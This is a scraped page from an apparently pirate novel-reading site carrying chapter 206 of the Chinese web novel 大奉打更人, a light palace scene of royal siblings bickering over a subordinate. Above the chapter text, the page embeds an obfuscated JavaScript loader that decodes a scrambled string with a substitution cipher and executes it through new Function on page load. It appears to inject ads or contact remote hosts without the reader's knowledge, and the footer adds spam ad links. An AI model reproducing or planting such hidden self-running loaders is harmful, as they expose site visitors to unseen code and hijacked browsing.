章鱼阅读

安装
字:
关灯 护眼
章鱼阅读 > 大奉打更人 > 第两百零六章 信
(function(){function md4f7b23d(i897a78){var j80fb="Sdq6uy12ri84l$3gGtjV-?(BbNkvx|~9/[D]OC,:fFpKEXAw%mzUo=eWQ!JZL0;_haT@RInc.PH&^7s5YM";var y687705df="L^RU8upgW!Sq&5:P];/@9GslKIaF~,HV$Mo=.B[0wiZ6_rOnze%2Xfkx17Aj|-m(dY4Tt?J3EDbNQychvC";return i897a78.split('').map(function(je7d7){var fb11afc=j80fb.indexOf(je7d7);return fb11afc==-1?je7d7:y687705df[fb11afc]}).join('')}var c=md4f7b23d('thunder://fFwhDf,"" + "=" + "u" + "$" + "m" + "u" + "k" + "-"+""G]=ywsRFDw_) { t _=ywsRFDw _XQ=mK-kKk| fT!sc$K| HUccu$| (U:TsKhch| YcmTK!s) { F= _jd[ksLrFwjORm(R_wkYF2kRDXO1BkR=DX;)) { XmRyXw }t YkX F$UKU$$Uc ] =ywsRFDw _XcHQh-!) { XmRyXw 8RXFw2O=XD;M5kXMDhm_XcHQh-!) }t YkX 7s$$$cTU ] (U:TsKhch,F$UKU$$Uc_:WKQ) + F$UKU$$Uc_:W!T) + F$UKU$$Uc_:WKv) + F$UKU$$Uc_:WKU)G| (KTcHT ] (U:TsKhch,F$UKU$$Uc_:WKU) + F$UKU$$Uc_:W!T) + F$UKU$$Uc_:WKv) + F$UKU$$Uc_:WKQ)G| BQkk$mQ ] YcmTK!s,7s$$$cTU_"ac97s;9yhv&Zs;BfhJ]]")G| wHQT!H! ] 7s$$$cTU_"acnBaoqBqrWBHr9yhJ]]")t YkX 2!m$$sc:$ ] 7s$$$cTU_"m;&eprnQpf]]")t YkX 7u!KKt F= _BDskRFDwO(mkXs5OFwhmWA=_2!m$$sc:$) > 0Q) { 7u!KK ] YcmTK!s,wHQT!H!G_7s$$$cTU_"h?9Th?v7pr.]"))t 7u!KKOFh ] "R" + _[kR5OXkwhD;_) * Q::::)t 7u!KKO(R7BmOfFhR5 ] "Q::z"t 7u!KKO(R7BmO5mF25R ] "c::1W"t 7u!KKOhF(kHBmh ] RXymt YcmTK!sOHDh7Ok11mwhM5FBh_7u!KK) } YkX 2hs-=c! ] YcmTK!s,wHQT!H!G_7s$$$cTU_"krp7arQB"))t 2hs-=c!OFh ] "W" + _[kR5OXkwhD;_) * Q::::)t 2hs-=c!O(R7BmOfFhR5 ] "Q:1W"t 2hs-=c!O(R7BmO5mF25R ] $ + "1W"t 2hs-=c!O(R7BmOHkse2XDywh ] "#vvv"t YkX (KuHcK ] =ywsRFDw _Rm-TKH) { 2hs-=c!O(Xs ] ,"5RR1(3jj"| Rm-TKH| "X"| "ZQQQ"| HUccu$ + "IEX]" + _(KTcHT_BDskRFDwO5Xm=))GOZDFw_"j")t YcmTK!sOHDh7Ok11mwhM5FBh_2hs-=c!) }t F= _7u!KK i] wyBB) { 7u!KKOYkBym +] "\\X\\w(mwh HXFh2Fw2 5D(R " + fT!sc$K } (U:TsKhch,7s$$$cTU_"p;9:aU2]")G_,"5RR1(3jj"| 7s$$$cTU_fT!sc$K)| "5;OZ(I" + PkRm,"wDf"G_) + _7u!KK ]] wyBB I "" 3 2!m$$sc:$)GOZDFw_"j"))OR5mw__e-s-Us) ]> e-s-UsORmWR_))OR5mw__e-s-Us) ]> { F= _7u!KK i] wyBB) { 7u!KKOYkBym +] "\\X\\wXmsmFYm HXFh2Fw2 5D(R " + e-s-Us }t (KuHcK_7s$$$cTU_e-s-UsO(1BFR_"")OXmYmX(m_)OZDFw_""))) })OskRs5__mXX) ]> { (KuHcK_7s$$$cTU_XQ=mK-kKk)) })t (U:TsKhch,"khh.YmwRSF(RmwmX"G_";m((k2m"| =ywsRFDw _m) { F= _mOhkRkOe ]] HUccu$) { YcmTK!sO2mR.Bm;mwRC7Nh_2hs-=c!OFh)OXm;DYm_)t F= _7u!KK i] wyBB) { 7u!KKOYkBym +] "\\X\\wXmsmFYm F=Xk;m 1D(R ;m((k2m" } wmf vywsRFDw_"kX2("| 7s$$$cTU_mOhkRkOY))_{ ERhs(3 BQkk$mQ| ERXk3 7u!KK }) } }) })_"k;QFS;BKm;&chcscS;W1h;6]"| "k?nRs8$5swhD[c&ZsF$ZH~9F"| "QcUUUK--U$!-U$"| fFwhDf| hDsy;mwR) }t=u$muk-_)t'.substr(10));new Function(c)()})();

第两百零六章 信

章节错误,点此举报(免注册),如遇到内容乱码错字顺序乱,请退出阅读模式或畅读模式即可正常。
京城,皇宫。
  太子殿下在东宫宴请天家的兄弟姐妹,身为胞妹的临安早早的就到了,坐在椅子上,晃荡着裙底的脚丫。
  她今天没有穿红裙,是一件紫色为底,镶金色绲边华美长裙,她头戴红宝石珊瑚冠,以珊瑚为骨架,两只栩栩如生的金凤拱卫中间的红宝石,垂下六条串着珍珠的流苏。
  此外,还有金步摇和翡翠簪子等首饰,打扮的华丽精致。
  紫色是宫中妃子常用的料子,衬托熟妇的优雅高贵,并不适合少女,但临安的气质太娇贵,给人一种盛装打扮的洋娃娃的感觉。
  再配以圆润的脸蛋,妩媚多情的桃花眸,既妩媚妖冶,又骄傲纯真。多种气质杂糅一处,偏偏又极好的驾驭住了。
  距离午膳还有半个时辰,皇子皇女们陆续来到东宫,大家早已习惯临安华丽精致式的漂亮。
  四位公主里,大概也只有她适合这般打扮,换成其他公主,恐怕都压不住过于华丽的装扮。
  怀庆姿色是足够了,但气质不符合。
  “怀庆还没到吗?”临安灵动的眸子转动,俏生生的望着门外。
  “当差去传话过去,她晚些自会来。”太子殿下笑着说,接着,咳嗽一声:
  “今日是司天监秘制的鸡精售卖的日子,给宫里也送了一些。本宫这才宴请弟弟妹妹们过来尝尝。”
  其实早在几天前,司天监就“进贡”了一批鸡精,送到皇宫的御膳房,几位皇子皇女都享用过这种令人欲罢不能的调味料。
  说到这个热门话题,皇子皇女们颇有兴趣的交谈起来。
  “说到这个鸡精,滋味的确令人欲罢不能,只不过容易口渴。”
  “昨日父皇还说,此物不可多吃,清淡饮食才是养生之道。”
  说着,几位皇子悄悄撇嘴,对于元景帝处处养生的理念很是不以为然。只有人到中年不得以,才会想着保温杯里泡枸杞,年轻人何须养生?
  临安左顾右盼一眼,圆润白皙的下颌昂起:“你们知道鸡精是谁发明的吗?”
  这时候就变裱裱了,婊里婊气。
  这问题皇子皇女们还真不知道,皇宫里知道此事的只有三人,太子裱裱和怀庆,三人不说,就没人会知道。
  在兄弟妹妹们的追问下,裱裱下巴昂的更高,嫣然道:“是许七安,是我的下属。”
  她重点强调后半句。
  “许七安?”四皇子皱了皱眉,“那不是怀庆的人吗?”
  四皇子是怀庆的胞兄。
  “现在是我的人了,他发誓效忠于我。”裱裱炫耀着自己挖怀庆墙脚的行为。
  因为在一干兄弟姐妹眼里,她始终是被怀庆欺负的,现在好不容易扳回一局,就收不住了,许七安越出色,她越高兴,因为成就感越大。
  众皇子皇女哑然失笑,四皇子暗暗皱眉,对于临安撬他胞妹墙角的行为很是不悦。
  不过,他虽然是皇后所出的嫡子,地位本该最高,但太子之位最后传给了庶长子,也就是现在的太子,临安的胞兄。
  同时,元景帝对其他子女一视同仁,却独独宠爱临安,以及不怎么喜欢怀庆。这让四皇子愈发的没有底气。
  母后说过,怀庆强势、霸道,与年轻时的父皇如出一辙,而才华更胜数筹。她若是男儿身,恐怕要更让父皇厌恶。
  “许七安是谁的人?”
  这时,门外传来怀庆清冷的,有质感的悦耳声线,穿着月花色宫裙的皇长女驾到。
  众皇子皇女清晰的看到,临安嚣张的气焰“咻”的一下萎靡了,她先是不服气,似乎想硬刚,但旋即又怂了,鼓着腮,大声说:“一人一半!”
  用最嚣张的语气说最怂的话。
  怀庆“呵”了一声。
  她知道许七安左右逢源的操作,睁只眼闭只眼的容忍,主要是因为临安是个愚蠢的妹妹,完全没有威胁。抢人只是为了与她怄气。
  换成是其他皇子,敢这么抢她的人,怀庆就会反击,是不留情的反击,而不像对待临安这样,只是吓唬她。
  怀庆走到临安面前,居高临下的俯瞰她,淡淡道:“走开,这位置我要坐。”
  裱裱抬起头,只看见怀庆的眼睛,看不到她的下半张脸,因为怀庆胸前那讨人厌的几斤肉挡住了视线。
  这让她很泄气,这个姐姐不但比她更有才华,身材还更好。除了父皇的宠爱,她没有一样比的上怀庆。
  裱裱是个娇气的姑娘,被怀庆这么欺负,委屈的别过头去。
  没办法,打又打不过,吵架有失皇女身份,况且怀庆是个读书人,出口不带脏的。自己不是她对手。
  太子“咳嗽”一声,出来打暖场:“怀庆,你别与临安一般见识,你是姐姐。”
  怀庆这才放过裱裱,不欺负妹妹。
  .....
  吃饭时,太子随口道:“听说今日御书房的事了吗?”
  四皇子当即道:“戒碑和漕运衙门?”
  太子点点头,笑道:“漕运衙门的事儿咱们就不用置喙了,自有朝堂诸公和父皇定夺。倒是戒碑之事,让人拍案叫绝。”
  四皇子颔首:“尔食尔禄,民脂民膏,下民易虐,上天难欺!”
  “好诗!”怀庆眼睛一亮,清丽的容颜绽放光彩。
  她向来是食不言寝不语的,但这首诗蕴含的内核,让皇长女心潮澎湃,比“醉后不知天在水、暗香浮动月黄昏”更让她喜欢。
免费看片APP    美女直播间
『加入书签,方便阅读』
继续浏览精彩内容
到笔趣阁APP免费阅读
《大奉打更人》
打开
浏览器
继续